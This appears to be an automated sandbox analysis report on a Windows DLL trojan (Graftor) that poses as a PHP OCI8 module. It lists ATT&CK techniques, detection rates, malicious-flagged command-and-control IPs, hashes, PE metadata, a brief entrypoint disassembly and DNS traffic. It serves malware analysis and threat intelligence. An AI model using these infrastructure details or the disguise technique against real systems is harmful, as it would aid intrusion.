Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	Path Interception	Process Injection12	Virtualization/Sandbox Evasion1	Input Capture1	Security Software Discovery21	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Scripting1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery11	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Variant.Graftor.981531.21000.dll	33%	Virustotal		Browse
SecuriteInfo.com.Variant.Graftor.981531.21000.dll	24%	ReversingLabs	Win32.Trojan.Graftor
SecuriteInfo.com.Variant.Graftor.981531.21000.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.loaddll32.exe.6e560000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.rundll32.exe.2840000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.2840000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.2840000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.php.netD	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.php.netD	loaddll32.exe, 00000000.00000002.324643149.000000006E58E000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Graftor.981531.21000.dll	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.248.178.90	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
173.212.243.155	unknown	Germany	51167	CONTABODE	true
46.55.222.10	unknown	Bulgaria	34841	BALCHIKNETBG	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	455752
Start date:	28.07.2021
Start time:	21:01:57
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Variant.Graftor.981531.21000.9246 (renamed file extension from 9246 to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.winDLL@6/4@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 54.5% (good quality ratio 49.4%) Quality average: 74% Quality standard deviation: 32.5%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 23.54.113.53, 168.61.161.212, 40.88.32.150, 104.42.151.234, 20.50.102.62, 8.241.78.254, 8.238.27.126, 8.248.145.254, 67.26.75.254, 8.241.82.126, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43, 95.100.54.203 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
21:03:32	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
104.248.178.90	Statement_5877325.xlsm	Get hash	malicious	Browse
	hTP1xwe3MO.dll	Get hash	malicious	Browse
	WZ0otpGrgF.dll	Get hash	malicious	Browse
	AZh41nXop1.dll	Get hash	malicious	Browse
	hTP1xwe3MO.dll	Get hash	malicious	Browse
	WZ0otpGrgF.dll	Get hash	malicious	Browse
	AZh41nXop1.dll	Get hash	malicious	Browse
	6gf0ZGysE6.dll	Get hash	malicious	Browse
	Pqg23p68uo.dll	Get hash	malicious	Browse
	g4xPLd5Vzm.dll	Get hash	malicious	Browse
	5X65Ivc6sv.dll	Get hash	malicious	Browse
	AUfcZObm3n.dll	Get hash	malicious	Browse
	zb1pglGBLc.dll	Get hash	malicious	Browse
	9fF9NN7guQ.dll	Get hash	malicious	Browse
	phnp9HXQj5.dll	Get hash	malicious	Browse
	6gf0ZGysE6.dll	Get hash	malicious	Browse
	Pqg23p68uo.dll	Get hash	malicious	Browse
	g4xPLd5Vzm.dll	Get hash	malicious	Browse
	5X65Ivc6sv.dll	Get hash	malicious	Browse
	AUfcZObm3n.dll	Get hash	malicious	Browse
173.212.243.155	Statement_5877325.xlsm	Get hash	malicious	Browse
	hTP1xwe3MO.dll	Get hash	malicious	Browse
	WZ0otpGrgF.dll	Get hash	malicious	Browse
	AZh41nXop1.dll	Get hash	malicious	Browse
	hTP1xwe3MO.dll	Get hash	malicious	Browse
	WZ0otpGrgF.dll	Get hash	malicious	Browse
	AZh41nXop1.dll	Get hash	malicious	Browse
	6gf0ZGysE6.dll	Get hash	malicious	Browse
	Pqg23p68uo.dll	Get hash	malicious	Browse
	g4xPLd5Vzm.dll	Get hash	malicious	Browse
	5X65Ivc6sv.dll	Get hash	malicious	Browse
	AUfcZObm3n.dll	Get hash	malicious	Browse
	zb1pglGBLc.dll	Get hash	malicious	Browse
	9fF9NN7guQ.dll	Get hash	malicious	Browse
	phnp9HXQj5.dll	Get hash	malicious	Browse
	6gf0ZGysE6.dll	Get hash	malicious	Browse
	Pqg23p68uo.dll	Get hash	malicious	Browse
	g4xPLd5Vzm.dll	Get hash	malicious	Browse
	5X65Ivc6sv.dll	Get hash	malicious	Browse
	AUfcZObm3n.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CONTABODE	Statement_5877325.xlsm	Get hash	malicious	Browse	173.212.243.155
	hTP1xwe3MO.dll	Get hash	malicious	Browse	173.212.243.155
	WZ0otpGrgF.dll	Get hash	malicious	Browse	173.212.243.155
	AZh41nXop1.dll	Get hash	malicious	Browse	173.212.243.155
	hTP1xwe3MO.dll	Get hash	malicious	Browse	173.212.243.155
	WZ0otpGrgF.dll	Get hash	malicious	Browse	173.212.243.155
	AZh41nXop1.dll	Get hash	malicious	Browse	173.212.243.155
	6gf0ZGysE6.dll	Get hash	malicious	Browse	173.212.243.155
	Pqg23p68uo.dll	Get hash	malicious	Browse	173.212.243.155
	g4xPLd5Vzm.dll	Get hash	malicious	Browse	173.212.243.155
	5X65Ivc6sv.dll	Get hash	malicious	Browse	173.212.243.155
	AUfcZObm3n.dll	Get hash	malicious	Browse	173.212.243.155
	zb1pglGBLc.dll	Get hash	malicious	Browse	173.212.243.155
	9fF9NN7guQ.dll	Get hash	malicious	Browse	173.212.243.155
	phnp9HXQj5.dll	Get hash	malicious	Browse	173.212.243.155
	6gf0ZGysE6.dll	Get hash	malicious	Browse	173.212.243.155
	Pqg23p68uo.dll	Get hash	malicious	Browse	173.212.243.155
	g4xPLd5Vzm.dll	Get hash	malicious	Browse	173.212.243.155
	5X65Ivc6sv.dll	Get hash	malicious	Browse	173.212.243.155
	AUfcZObm3n.dll	Get hash	malicious	Browse	173.212.243.155
DIGITALOCEAN-ASNUS	gNzYU3qdGH	Get hash	malicious	Browse	142.93.42.201
	Statement_5877325.xlsm	Get hash	malicious	Browse	104.248.178.90
	E51BZ4gBRo.exe	Get hash	malicious	Browse	64.227.87.162
	hTP1xwe3MO.dll	Get hash	malicious	Browse	104.248.178.90
	WZ0otpGrgF.dll	Get hash	malicious	Browse	104.248.178.90
	AZh41nXop1.dll	Get hash	malicious	Browse	104.248.178.90
	hTP1xwe3MO.dll	Get hash	malicious	Browse	104.248.178.90
	WZ0otpGrgF.dll	Get hash	malicious	Browse	104.248.178.90
	AZh41nXop1.dll	Get hash	malicious	Browse	104.248.178.90
	6gf0ZGysE6.dll	Get hash	malicious	Browse	104.248.178.90
	Pqg23p68uo.dll	Get hash	malicious	Browse	104.248.178.90
	g4xPLd5Vzm.dll	Get hash	malicious	Browse	104.248.178.90
	5X65Ivc6sv.dll	Get hash	malicious	Browse	104.248.178.90
	AUfcZObm3n.dll	Get hash	malicious	Browse	104.248.178.90
	zb1pglGBLc.dll	Get hash	malicious	Browse	104.248.178.90
	9fF9NN7guQ.dll	Get hash	malicious	Browse	104.248.178.90
	phnp9HXQj5.dll	Get hash	malicious	Browse	104.248.178.90
	6gf0ZGysE6.dll	Get hash	malicious	Browse	104.248.178.90
	Pqg23p68uo.dll	Get hash	malicious	Browse	104.248.178.90
	g4xPLd5Vzm.dll	Get hash	malicious	Browse	104.248.178.90

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_32fa6fec497173fc732ebebe07c2c8452309a_82810a17_1678a8a2\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11884
Entropy (8bit):	3.7665246733459377
Encrypted:	false
SSDEEP:	192:UaW9izm0oX36HQ0Ztjed+c3/u7s4S274ItWcg:EizAXiQ0Ztjep/u7s4X4ItWcg
MD5:	2FF40BB3404552C321C19DFC1CD4BF82
SHA1:	868505C4D89FBEC9B63D34D8FF34A079FC5639C9
SHA-256:	9DDEB5A04723691DCEA4E082483162810B1AC072EE8D22FEAFFDE1EB238B625A
SHA-512:	582F9A2992633978CECBEEED300C039C3352FF932ADFE3CEE59350AA420B6C9B602AEFBE8A28DBFF4C514E6287537BE9E0DC63778BA56DBBF57CC1F02A80D3B9
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.2.0.0.5.0.0.2.6.8.0.9.2.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.2.0.0.5.0.1.0.1.8.0.8.6.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.4.c.c.2.a.e.-.f.5.6.3.-.4.b.9.0.-.a.5.2.0.-.b.a.d.2.1.e.2.7.c.9.b.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.2.a.b.0.9.5.-.3.3.c.2.-.4.a.2.d.-.8.d.4.c.-.f.c.3.4.0.9.2.4.9.e.8.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.b.0.-.0.0.0.1.-.0.0.1.7.-.9.1.f.4.-.c.7.9.6.2.e.8.4.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER83D4.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Jul 29 04:03:24 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	38796
Entropy (8bit):	2.3615127873150676
Encrypted:	false
SSDEEP:	192:Zlk91YKHFUOlx8+KZEMDC7Zk9+1FNZL3xHIthiq5C1oj5snTet:/Q1LbG/eVcWZLMhiq5CatsTet
MD5:	935344E601A58A560FDF0AB709F4110C
SHA1:	2AC42B0747FC9EAF42562CE69690C5C6ABB094F8
SHA-256:	87ADEB4B5D929486705D9E6DBF4C35AFC6050745AB3BEA331E8145199BD2E4FD
SHA-512:	56B09A70255B776FF95E0D740E7EC639F982597364E69971D4EE5B0D8E847B43B3F81A84AD0AA38DD06D2825037A9989CE3E4F1859811629C4A6E5AC5733953D
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........(.a...................U...........B..............GenuineIntelW...........T...........f(.a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DC8.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8340
Entropy (8bit):	3.6910757978882964
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi3Y6Pm827t6YFr6k8gmfTFLSHCprRD89bfdsfuW71m:RrlsNiI6+827t6YZ6k8gmfTRSMUfWfm
MD5:	4DAABFA0B38CEB7086EFE325E44486A4
SHA1:	D8881B7BBAF1780189032E723D7BB85FD7730216
SHA-256:	EB12A4C76222839831187055C00C9D5C7AB0F413492B9299DB9763708FD3FE33
SHA-512:	A2F68A914744B4A83BC7B83072C95A66AE32110999FB1810A48875C9BF9A9BDC2F927A284A74360AF5D8C583997D98A1A1DFD654906B43C241FC157A5A7AC777
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.7.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9192.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4700
Entropy (8bit):	4.485795788425257
Encrypted:	false
SSDEEP:	48:cvIwSD8zsJJgtWI9HJjRWSC8B28fm8M4JCds1usFHz+q8/2BRK4SrSUd:uITfb0JjASNZJrNzRCDWUd
MD5:	C1C7F3304DEA7748BE849179CE3D45FC
SHA1:	4F1992FD613BB333B9A78AEB277E75EC9ADF9854
SHA-256:	0D2FF16532F15E795FB84A1B8099EC45510DB3E83AEC41DB08B0418B0C79AEF0
SHA-512:	3368CC82D5651EC15E3320D223460CBDF660AC6AAEC8E44534E3024D437DABE9083A7F828528E703232E7F2A3671E98E9B5806165E4E9542281F653D593F41E8
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1098074" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.333069151649206
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Variant.Graftor.981531.21000.dll
File size:	179712
MD5:	f3895703410910aa0ef2f7da6a12dd49
SHA1:	18a05909877ba997e3acda5426d5a28a4159c089
SHA256:	688bc9341860e2f04f307f162f71a628896bc6ca9fa200be54eee05a4b69cb72
SHA512:	9e7fb076d894f8ab933ad00b2d1e4dfc9d92e2608ec1efe41d08346be287991a6cdc3528eb93935bf07c2525af1008e5e4199e976fbb1f25906ef563e88f2c2b
SSDEEP:	3072:cC1Oe6ths2hyT0DzJfN3ZKU3YkmN5Sw4Q2kUl59Pn9ObAAW0f3:cC1Oem/DzJhok45X4HPYb
File Content Preview:	MZ......................@...................................t...v,..2M..2M..2M..T.4..M..T.4..M.......M..15...M...)...L..?.!..L.......L....5..M......#M..\...KM..O4".hL..];T.]M...: ..M....7..L...)...L..).c..M..,.z..M.......M..T.7..M..2M..lL.......M..Rich2M.

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10006770
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x610E3E1A [Sat Aug 7 08:02:34 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	9451e8b8b1259e622801dd0cdc59802c

Entrypoint Preview

Instruction
call 00007F02649F2860h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
and esp, FFFFFFF8h
sub esp, 000000D8h
lea eax, dword ptr [esp+00000090h]
mov word ptr [esp+000000CEh], 8357h
mov dword ptr [esp+000000B8h], 003B1B4Dh
mov byte ptr [esp+0000008Dh], 0000006Bh
mov cl, byte ptr [esp+0000008Dh]
mov dword ptr [esp], eax
mov byte ptr [esp+1Bh], cl
call 00007F02649F57D0h
mov cl, E8h
mov dl, byte ptr [esp+1Bh]
cmp cl, dl
mov dword ptr [esp+14h], eax
jnc 00007F02649F73E9h
jmp 00007F02649F73CFh
mov eax, dword ptr [esp+44h]
mov dword ptr [esp+000000C4h], 00FFFFFFh
mov dword ptr [esp+000000C0h], 00D0F135h
mov dword ptr [esp], eax
call 00007F02649F4E77h
lea ecx, dword ptr [esp+24h]
mov eax, dword ptr [eax+50h]
mov dword ptr [esp+00000084h], eax
mov dl, byte ptr [esp+1Bh]
add dl, dl
mov byte ptr [esp+000000BFh], dl
mov eax, dword ptr [esp+000000B8h]
add eax, 8BC4E4B4h
mov dword ptr [esp], ecx
mov dword ptr [esp+10h], eax
call 00007F02649F1C84h
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+00h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x257e0	0x61	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x258b0	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2e000	0x518	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2f000	0xa68	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7032	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x30	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5f0d	0x5e00	False	0.37109375	data	4.24903636585	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1ea10	0x1ec00	False	0.820098132622	data	7.74467634199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x26000	0x7854	0x5e00	False	0.510098071809	data	6.67697384904	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2e000	0xb79	0x600	False	0.401041666667	data	3.05840578194	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2f000	0xb5d	0xc00	False	0.5302734375	data	5.64204264895	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x2e060	0x4b4	data	English	United States

Imports

DLL	Import
OLEAUT32.dll	VarI2FromCy
USER32.dll	TranslateMessage
msvcrt.dll	memset
KERNEL32.dll	OutputDebugStringA, GetModuleFileNameA, GetModuleHandleW
ADVAPI32.dll	RegOverridePredefKey

Version Infos

Description	Data
LegalCopyright	Copyright 1997-2018 The PHP Group
InternalName	SIR8_12L tthewtfeb
FileVersion	7.6.8
CompanyName	The PHP Group
URL	http://www.php.net
LegalTrademarks	PHP
Comments	Thanks to Stig Bakken, Thies C. Arntzen, Andy Sautins, David Benson, Maxim Maletsky, Harald Radi, Antony Dovgal, Andi Gutmans, Wez Furlong, Christopher Jones, Oracle Corporation
ProductName	SIR
ProductVersion	7.6.8
FileDescription	OCI8
OriginalFilename	sir_ehh8_12h.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 28, 2021 21:02:40.429536104 CEST	64267	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:40.450295925 CEST	53	64267	8.8.8.8	192.168.2.6
Jul 28, 2021 21:02:41.562653065 CEST	49448	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:41.588987112 CEST	53	49448	8.8.8.8	192.168.2.6
Jul 28, 2021 21:02:42.005836964 CEST	60342	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:42.028490067 CEST	53	60342	8.8.8.8	192.168.2.6
Jul 28, 2021 21:02:42.871262074 CEST	61346	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:42.892626047 CEST	53	61346	8.8.8.8	192.168.2.6
Jul 28, 2021 21:02:44.022634983 CEST	51774	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:44.043879986 CEST	53	51774	8.8.8.8	192.168.2.6
Jul 28, 2021 21:02:45.385360003 CEST	56023	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:45.409840107 CEST	53	56023	8.8.8.8	192.168.2.6
Jul 28, 2021 21:02:46.343559027 CEST	58384	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:46.364135027 CEST	53	58384	8.8.8.8	192.168.2.6
Jul 28, 2021 21:02:47.750207901 CEST	60261	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:47.771768093 CEST	53	60261	8.8.8.8	192.168.2.6
Jul 28, 2021 21:02:51.131330967 CEST	56061	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:51.154548883 CEST	53	56061	8.8.8.8	192.168.2.6
Jul 28, 2021 21:02:52.327632904 CEST	58336	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:52.350408077 CEST	53	58336	8.8.8.8	192.168.2.6
Jul 28, 2021 21:02:53.563396931 CEST	53781	53	192.168.2.6	8.8.8.8
Jul 28, 2021 21:02:53.585982084 CEST	53	53781	8.8.8.8	192.168.2.6
